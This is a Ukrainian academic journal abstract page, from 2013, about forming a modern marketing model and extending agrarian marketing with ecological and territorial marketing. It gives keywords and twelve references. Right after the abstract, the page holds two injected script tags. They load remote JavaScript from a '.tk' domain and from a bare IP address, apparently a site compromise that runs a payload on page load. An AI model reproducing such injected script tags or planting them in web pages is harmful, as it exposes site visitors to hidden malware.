ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 658.8:338.432
Проблеми економічної теорії

До проблеми формування сучасної моделі маркетингу в Україні / Романова Л. В. // Економіка АПК. - 2013. - № 5 - С. 102

Обґрунтовано необхідність переходу до формування сучасної моделі маркетингу. Визначено проблеми неприйняття маркетингу, зокрема, невідповідність цілей, знецінення значення маркетингової діяльності, падіння довіри на тлі культурного і духовного занепаду, нечіткого визначення предмета маркетингу. На основі моделі маркетингу 3.0 запропоновано підходи до визначення сучасного маркетингу та доцільність внесення коректив у розуміння аграрного маркетингу. В даному контексті аграр-ний маркетинг пропонується концептуально доповнити екологічним і територіальним маркетингом. Вбачається необхідність подальших наукових досліджень з метою розробки методичних та практичних рекомендацій по уточненню й реалізації сучасної моделі маркетингу в галузевому розрізі. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: маркетинг, модель маркетингу, обмін, цінності, культура, потреби споживачів

Список використаних джерел

 1. Бакан Джоэл. Корпорация: патологическая погоня за прибылью; пер. с англ. / Джоэл Бакан. – М.: ООО “И.Д.Вильямс”, 2007. – 288 с.
 2. Бойетт Джозеф Г. Путиводитель по царству мудрости: лучшие идеи мастеров управления; пер. с англ.– 2-е изд.; стер. / Джозеф Г. Бойетт, Джимми Т. Бойетт. – М.: ЗАО “Олимп-Бизнес”, 2002. – 416 с.
 3. Дафт Р.Л. Менеджмент / Р.Л. Дафт. – СПб.: Издательство «Питер», 2000. – 832 с.
 4. Дж. О Шонесси. Конкурентный маркетинг: Стратегический поход; пер. с англ. под ред. Д.О. Ямпольской / Дж. О Шонесси. – СПб.: Питер, 2002. – 864 с.
 5. Классики маркетинга / сост. Энис Б.М. – СПб.: Питер, 2001. – 752 с.
 6. Котлер Ф. Маркетинг менеджмент / Ф. Котлер, К.Л. Кеплер. [12 изд.]. – СПб. : Питер, 2009. -816 с.
 7. Котлер Ф. Маркетинг 3.0. От продуктов к потребителю и далее – к человеческой душе /Ф. Котлер, Х. Картаджакайн, А. Сетиаван: пер. с англ. А. Заякина. – М.: Альпина Бизнес Букс, 2012. – 240 с.
 8. Романова Л.В. Реалізація маркетингу в управлінні конкурентоспроможністю підприємств: необхідність зміни пріоритетів / Л.В. Романова // Вісн. АПСВ. – 2008. – № 2. – С. 72-77.
 9. Шоу Роберт. Прибыльный маркетинг: окупается ли ваш маркетинг? Шоу Роберт, Меррик Давид; пер. с англ. И. Коберник. – К.: Companion Croup, 2007. – 496 с.
 10. Создание бренда изнутри путем вовлечения сотрудников [Электронный ресурс]. – Режим доступа: www.advertologu.ru.
 11. Стивен Р. Кови. Семь навыков высокоэффективных людей / Кови Р. Стивен. – Ульяновск: „Свет”, 2001. – 452 с.
 12. Фукуяма Ф. Доверие: социальные добродетели и путь к процветанию: пер. с англ./ Ф. Фукуяма. – М.: АСТ: АСТ МОСКВА: ХРАНИТЕЛЬ, 2006. – 730 с.
Читати статтю: 13_05_17.pdf